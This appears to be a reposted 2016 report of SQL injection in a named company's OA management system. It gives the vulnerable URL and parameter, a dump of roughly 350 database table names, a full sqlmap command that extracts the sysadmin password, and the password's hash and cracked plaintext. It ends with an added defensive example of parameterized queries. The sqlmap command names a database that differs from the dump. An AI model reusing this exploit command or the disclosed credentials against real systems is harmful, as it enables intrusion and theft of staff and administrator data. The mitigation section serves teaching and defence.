SQL injection in a 文轩网 (Winxuan) management system (a bloodbath sparked by a garbage bag / large volumes of data / multiple administrator accounts / internal information / over a thousand administrators / internal materials / sensitive information)
2016-05-09 09:05:21           
Today, when I went downstairs to take out the trash, I noticed a packaging bag printed with "文轩网" (Winxuan). When I got back I tested the site, and unexpectedly it set off a whole bloodbath.

oa.winxuan.com


 

https://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1



The formid parameter is injectable.




350 databases. Because sqlmap could not display them directly, I dug them out of the log and lined them up one by one by hand; give me 20 points just for the effort.

JSP
back-end DBMS: Oracle
Database: OAUSER

+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SCORE                          | 17936023 |
| PERMISSIONLINKDOCBASE          | 6342260 |
| LOG                            | 5749886 |
| PERMISSIONDETAILDOCBASE        | 5503371 |
| SCORETMP                       | 1244885 |
| PERMISSIONDETAILWORKFLOWBASE   | 304448  |
| PERMISSIONLINKWORKFLOWBASE     | 293734  |
| PERMISSIONRULEDOCBASE          | 262420  |
| PERMISSIONRULEWORKFLOWBASE     | 262310  |
| WORKFLOWSTEPFINISHED           | 183342  |
| WORKFLOWINFOFINISHED           | 180505  |
| WORKFLOWOPERATORSFINISHED      | 140586  |
| WORKFLOWLOGFINISHED            | 125355  |
| ATTACH                         | 66960   |
| DOCATTACH                      | 54522   |
| WORKFLOWSTEP                   | 39600   |
| WORKFLOWINFO                   | 39180   |
| CATEGORYLINK                   | 38055   |
| DOCBASE                        | 35292   |
| PASSWORDHISTORY                | 29312   |
| WORKFLOWLOG                    | 28212   |
| UFG7S2O41194588032176T         | 27140   |
| EVENT                          | 19384   |
| WORKFLOWBASE                   | 15421   |
| PERMISSIONLINKPORTALCHANNALS   | 15264   |
| PERMISSIONDETAILPORTALCHANNALS | 15249   |
| UFF7K8K61221633602612T         | 13844   |
| UFJ3W3S41221633547510T         | 13831   |
| UFL0X4U31236061379146T         | 12725   |
| UFG3W9A31191920098875T         | 12613   |
| LABEL                          | 11655   |
| UFG0Y5L41221633619659T         | 11579   |
| UFA1Z8W21221633655798T         | 9747    |
| UFH3E4W91191919765921T         | 8970    |
| RTXU                           | 8194    |
| UFC4K0G21221633874179T         | 8038    |
| FORMLAYOUTFIELD                | 7956    |
| SYSUSER                        | 7922    |
| LABEL_NEW                      | 7859    |
| HUMRES                         | 7855    |
| SYSUSER_BAK                    | 7844    |
| HUMRES_BAK                     | 7777    |
| WORKFLOWOPERATORS              | 7491    |
| UFW1C6R51221634541611T         | 6319    |
| RTXUN                          | 6146    |
| UFG7S2O41194588032176          | 5869    |
| UFF2G8A01191907781421T         | 5721    |
| HUMRES_BACK                    | 5572    |
| HUMRESTEMP                     | 5163    |
| STATIONINFO                    | 4112    |
| Z1                             | 3892    |
| DOCINDIV                       | 3743    |
| STATIONLINK                    | 3491    |
| FORMFIELD                      | 3029    |
| UFG3W9A31191920098875          | 2857    |
| UFD1I6Q41194245212565          | 2695    |
| CATEGORY                       | 2435    |
| SELECTITEM                     | 2397    |
| UFG9O1U31427268735994T         | 2397    |
| UFW1J9T61269934662222T         | 2344    |
| IF_HUMRES                      | 2226    |
| UFH3E4W91191919765921          | 2166    |
| UFF2G8A01191907781421          | 2114    |
| UFA1Z8W21221633655798          | 1899    |
| UFF7K8K61221633602612          | 1899    |
| UFC4K0G21221633874179          | 1896    |
| UFW1C6R51221634541611          | 1896    |
| UFG0Y5L41221633619659          | 1894    |
| UFJ3W3S41221633547510          | 1894    |
| UFL0X4U31236061379146          | 1740    |
| UFZ1I5F91427270259217T         | 1688    |
| IF_STATIONINFO                 | 1462    |
| ORGUNIT                        | 1332    |
| UFW4F2G21430722144985T         | 1322    |
| KHZSJ                          | 1262    |
| UFJ4I3S41200992843804T         | 1080    |
| UFA5Y7Z81200990289777T         | 1078    |
| UFL2N6H71200991289728T         | 1078    |
| UFY2Z9J91200993227970T         | 1078    |
| UFO5T9B31200993254436T         | 1077    |
| ORGUNITLINK                    | 1058    |
| UFN4Q0D91201065966034T         | 1054    |
| BOOKSHEET                      | 1050    |
| SAPQQ                          | 1032    |
| RTXP                           | 1000    |
| UFI2T4P31385011501902T         | 976     |
| ZZ                             | 963     |
| UFH4O4P21434439724854          | 955     |
| UFY3X5U21214977469835T         | 903     |
| BB                             | 789     |
| UFE3V0Z41436239651329T         | 752     |
| UNLOCKUSER                     | 698     |
| EXPORT                         | 677     |
| UFW1J9T61269934662222          | 640     |
| DR                             | 609     |
| NODEINFO                       | 592     |
| UFW4F2G21430722144985          | 539     |
| PIPENODESTYLE                  | 536     |
| UFT6Y0E21239169073156T         | 525     |
| REMINDLOG                      | 498     |
| RYDRXX_BAK                     | 459     |
| UFR8V0S31201592887615T         | 440     |
| REPORTFIELD                    | 437     |
| UFU4Q6L41193280564254T         | 433     |
| DOCTYPE                        | 394     |
| REFOBJLINK                     | 364     |
| FORMLAYOUT                     | 361     |
| DIVPOSITION                    | 360     |
| MAILACCOUNT                    | 348     |
| REMINDRECEIVEOBJ               | 337     |
| UFI2T4P31385011501902          | 336     |
| PERMISSIONLINKREPORTDEF        | 334     |
| PORTALMODULES                  | 325     |
| UFG9O1U31427268735994          | 319     |
| UFZ1I5F91427270259217          | 319     |
| PERMISSIONDETAILREPORTDEF      | 316     |
| PORTALCHANPARAMODULES          | 286     |
| UFA2Q4C21193281172154T         | 275     |
| MENU                           | 274     |
| MENUORG                        | 266     |
| PORTALMODULECONFIG             | 256     |
| SELECTITEMTYPE                 | 253     |
| REMARK                         | 252     |
| UFF8U9E81395122755353T         | 247     |
| UFE3V0Z41436239651329          | 243     |
| WBSTASKHISTORY                 | 235     |
| REPORTSEARCHFIELD              | 226     |
| PERMISSIONRULEREPORTDEF        | 211     |
| MYPERMITBAG                    | 210     |
| UFJ4I3S41200992843804          | 192     |
| UFA5Y7Z81200990289777          | 191     |
| UFL2N6H71200991289728          | 191     |
| UFO5T9B31200993254436          | 191     |
| UFY2Z9J91200993227970          | 191     |
| WBSDOCFLOW                     | 191     |
| UFN4Q0D91201065966034          | 188     |
| PERMISSIONRULEPORTALCHANNALS   | 173     |
| UFK5R2Q01193282788864T         | 167     |
| UFR8V0S31201592887615          | 167     |
| DELOBJ                         | 165     |
| IF_ORGUNIT                     | 163     |
| WBSTASK                        | 149     |
| FORMINFO                       | 147     |
| PORTALCHANPARAS                | 144     |
| RYDRXX_BAK_1222                | 138     |
| UFY7Y3C31209373252583T         | 131     |
| SYSRESOURCE                    | 126     |
| PAGEMENU                       | 117     |
| KMTOPIC                        | 115     |
| PORTAL                         | 107     |
| SYSUSERROLELINK                | 106     |
| UFP6J3X91262843817858T         | 104     |
| PIPEINFO                       | 102     |
| REMINDMESSAGEDETAIL            | 97      |
| REMINDSENDOBJ                  | 97      |
| UFY3X5U21214977469835          | 97      |
| KMMAPTOPICLINK                 | 94      |
| SYSPERMRESLINK                 | 93      |
| PERMITBAG                      | 92      |
| UFY3T6F71193289145697T         | 90      |
| SETITEM                        | 89      |
| HUMRESCUSTOMIZE                | 85      |
| FORMLINK                       | 84      |
| SUBJECT                        | 84      |
| TEMP3                          | 84      |
| UFS6J0V21186643740812T         | 80      |
| UFY7Y3C31209373252583          | 79      |
| SEARCHCUSTOMIZEOPTION          | 78      |
| TEMP1                          | 75      |
| TEMP2                          | 75      |
| CONTEMPFIELD                   | 74      |
| UFC4H0T11193280596918T         | 70      |
| HHH                            | 67      |
| PERMISSIONRULEPIPEINFO         | 65      |
| REFOBJ                         | 60      |
| WBSTASKTEMPLATE                | 60      |
| UFA2Q4C21193281172154          | 58      |
| UFM8L3N01210227759384T         | 58      |
| UFK5R2Q01193282788864          | 57      |
| UFC4H0T11193280596918          | 56      |
| UFU4Q6L41193280564254          | 56      |
| UFY3T6F71193289145697          | 56      |
| ADDRESSINFO                    | 51      |
| GYSZSJ                         | 51      |
| PERMISSIONLINKPROJECT          | 50      |
| PERMISSIONDETAILPROJECT        | 49      |
| UFQ9H8S71395725696697T         | 49      |
| UFB5N0R31434341886193          | 47      |
| UFG5H0M21319164636037T         | 47      |
| UFK4H5T01278382941766T         | 47      |
| PIPEACCREDIT                   | 46      |
| ORGUNITTYPE                    | 44      |
| UFT6Y0E21239169073156          | 44      |
| RYDRXX                         | 43      |
| UFM2Y4U41210226662879T         | 42      |
| REPORTDEF                      | 41      |
| SYSROLEPERMLINK                | 41      |
| UFE3W8V51196906858771          | 41      |
| UFE3W8V51196906858771T         | 41      |
| SELFCUSTOM                     | 37      |
| UFB9T5N81395985987280T         | 36      |
| UFO3X9Z31395725358932T         | 36      |
| AA                             | 35      |
| PORTALTOPIC                    | 35      |
| PORTALCHANNALS                 | 33      |
| UFE4O5K91191920595703T         | 33      |
| UFX6P3U41214807405359T         | 33      |
| UFP6J3X91262843817858          | 31      |
| UFS6J0V21186643740812          | 31      |
| UFF8U9E81395122755353          | 30      |
| UFE3Q6S51228892267536T         | 28      |
| UFK4H5T01278382941766          | 27      |
| GYSZSJ_BAK                     | 25      |
| PERMISSIONRULEPROJECT          | 24      |
| UFE3Q6S51228892267536          | 24      |
| UFT8H8N31319164144745T         | 23      |
| UFE4O5K91191920595703          | 22      |
| UFR9F9Z51276157442595          | 22      |
| UFR9F9Z51276157442595T         | 22      |
| AUTHORIZEOPERATION             | 20      |
| UFQ9H8S71395725696697          | 20      |
| KMMAP                          | 19      |
| UFM8L3N01210227759384          | 19      |
| SYSPERMS                       | 18      |
| SYSROLE                        | 18      |
| UFG5H0M21319164636037          | 18      |
| WORKFLOWAUTHORIZELOG           | 18      |
| UFU4M7L61205906651800T         | 16      |
| UFC2N9R01208923738836T         | 13      |
| FAVLIST                        | 12      |
| SETITEMTYPE                    | 12      |
| UFM2Y4U41210226662879          | 12      |
| UFQ0S2A91259133802297T         | 12      |
| UFX6P3U41214807405359          | 12      |
| USERMENU                       | 12      |
| UFB4P7W91208923277799T         | 11      |
| STATIONLEVELLINK               | 10      |
| REMINDRULE                     | 9       |
| UFJ8Z6G41426816778795T         | 9       |
| UFO3X9Z31395725358932          | 9       |
| UFT8H8N31319164144745          | 9       |
| VERSIONINFO                    | 9       |
| KHZSJ_BAK                      | 8       |
| PIPEDOCTYPE                    | 8       |
| UFB9T5N81395985987280          | 8       |
| UFC4B3Q21185525667890T         | 8       |
| UFQ0S2A91259133802297          | 8       |
| ADDRESSSHEETMAP                | 7       |
| SEARCHCUSTOMIZE                | 7       |
| UFH2S6L11237441705568T         | 7       |
| PORTALTOPICLINK                | 6       |
| PROJECT                        | 6       |
| UDTYPE                         | 6       |
| UFL7E7V61259822162376T         | 6       |
| UFP3K1Q01267680510921T         | 6       |
| UFU4M7L61205906651800          | 6       |
| WBSVERSION                     | 6       |
| ATTACHMENT                     | 5       |
| CONTEMPLATE                    | 5       |
| CONTRACTTYPE                   | 5       |
| KEYINFO                        | 5       |
| UFC3H4A91228892239311T         | 5       |
| UFC4B3Q21185525667890          | 5       |
| UFC4C3V21193888200526          | 5       |
| UFC4C3V21193888200526T         | 5       |
| UFG1K2C01237771698639T         | 5       |
| UFJ8Z6G41426816778795          | 5       |
| UFP3K1Q01267680510921          | 5       |
| PERMISSIONRULECUSTOMER         | 4       |
| PERMISSIONRULEPRODUCT          | 4       |
| PROJECTTYPE                    | 4       |
| UFC2N9R01208923738836          | 4       |
| UFL7E7V61259822162376          | 4       |
| UFT1Q4K71237184297382T         | 4       |
| UFW4W9S01237184235289T         | 4       |
| WORKFLOWAGENTINFO              | 4       |
| AUTHTICKETINFO                 | 3       |
| UFB4P7W91208923277799          | 3       |
| UFG9Z3X81392010172464T         | 3       |
| UFI3J3D61186471722328T         | 3       |
| UFJ6Y6W11319179657036          | 3       |
| UFZ3K0Z41237875272949T         | 3       |
| WBSINFO                        | 3       |
| WORKFLOWAUTHORIZE              | 3       |
| PERMISSIONDETAILCONTRACT       | 2       |
| PERMISSIONLINKCONTRACT         | 2       |
| PERMISSIONLINKCUSTOMER         | 2       |
| PERMISSIONLINKPRODUCT          | 2       |
| PERMISSIONRULECONTRACT         | 2       |
| REFOBJMODEL                    | 2       |
| UFD1Y7I61319173459654          | 2       |
| UFI3J3D61186471722328          | 2       |
| AAA                            | 1       |
| ASSETSTYPE                     | 1       |
| CUSTOMERTYPE                   | 1       |
| ID_RECODE_DONTDELETE           | 1       |
| MAP                            | 1       |
| PERMISSIONDETAILASSETS         | 1       |
| PERMISSIONDETAILCUSTOMER       | 1       |
| PERMISSIONDETAILPRODUCT        | 1       |
| PERMISSIONDETAILPROVIDER       | 1       |
| PERMISSIONLINKASSETS           | 1       |
| PERMISSIONLINKPROVIDER         | 1       |
| PERMISSIONRULEASSETS           | 1       |
| PERMISSIONRULEMODEL            | 1       |
| PERMISSIONRULEPROVIDER         | 1       |
| PRODUCTTYPE                    | 1       |
| PROVIDERTYPE                   | 1       |
| SHOPTYPE                       | 1       |
| UFC3H4A91228892239311          | 1       |
| UFD1Y7I61319173459654T         | 1       |
| UFE6F0Y01186643861921          | 1       |
| UFE6F0Y01186643861921T         | 1       |
| UFG1K2C01237771698639          | 1       |
| UFH2S6L11237441705568          | 1       |
| UFJ6Y6W11319179657036T         | 1       |
| UFS6Z2C81395646749424          | 1       |
| UFS6Z2C81395646749424T         | 1       |
| UFT1Q4K71237184297382          | 1       |
| UFV3W4W41395647003213          | 1       |
| UFV3W4W41395647003213T         | 1       |
| UFW4W9S01237184235289          | 1       |
| UFZ3K0Z41237875272949          | 1       |
+--------------------------------+---------+



Because there are so many tables, I did not know which one holds the administrator accounts. You can run a statement directly from sqlmap to query it.

The default administrator is sysadmin.

C:\Python27\sqlmap>sqlmap.py -u "https://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1" -p formid --tamper=space2comment --batch -D zuzhibu -T sysuser --sql-query "select logonpass from sysuser where longonname='sysadmin'"


 

e3570e9e977fabb2ac818edc9a6a2e38



Decrypted, it is asdlkj321.



 




Information on 5000 back-end administrators.




A primary-school management system; you can watch videos and so on.

A large amount of sensitive information.




I'll stop here; mwah.


Solution:
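As an added illustration (not code from the original report or from the vendor), the `checkname` lookup with `formid` pasted into the SQL text, beside the same lookup with the value validated and bound as a parameter; the table, its columns and the sample rows are constructed here, since the real schema is unknown. In the JSP/Oracle stack the report identifies, the bound form corresponds to a `PreparedStatement` with `setInt` instead of string concatenation.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the OA form table (names are assumptions).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE forminfo (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO forminfo VALUES (?, ?)",
                     [(1, "leave_request"), (2, "expense_claim"), (3, "hr_review")])
    return conn


def check_name_vulnerable(conn, formid):
    # formid becomes part of the SQL text, so it can change the query's structure:
    # any value that is not a bare number rewrites the WHERE clause.
    sql = "SELECT name FROM forminfo WHERE id = " + formid
    return [row[0] for row in conn.execute(sql)]


def check_name_bound_only(conn, formid):
    # Binding alone already fixes the structural problem: the raw string is
    # compared as a value, never parsed as SQL, so a tautology matches no row.
    sql = "SELECT name FROM forminfo WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (formid,))]


FORMID_RE = re.compile(r"[0-9]{1,9}")


def check_name_safe(conn, formid):
    # Defence in depth: reject anything that is not a short positive integer
    # before it reaches the database, then bind the converted integer.
    if not FORMID_RE.fullmatch(formid):
        raise ValueError("formid must be numeric")
    sql = "SELECT name FROM forminfo WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(formid),))]


if __name__ == "__main__":
    db = make_db()
    print(check_name_vulnerable(db, "1"))           # ['leave_request']
    print(check_name_vulnerable(db, "1 OR 1=1"))    # every row leaks
    print(check_name_bound_only(db, "1 OR 1=1"))    # []
    try:
        check_name_safe(db, "1 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```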

 


Copyright: 红黑联盟 (dedicated to being a practical IT technology learning site)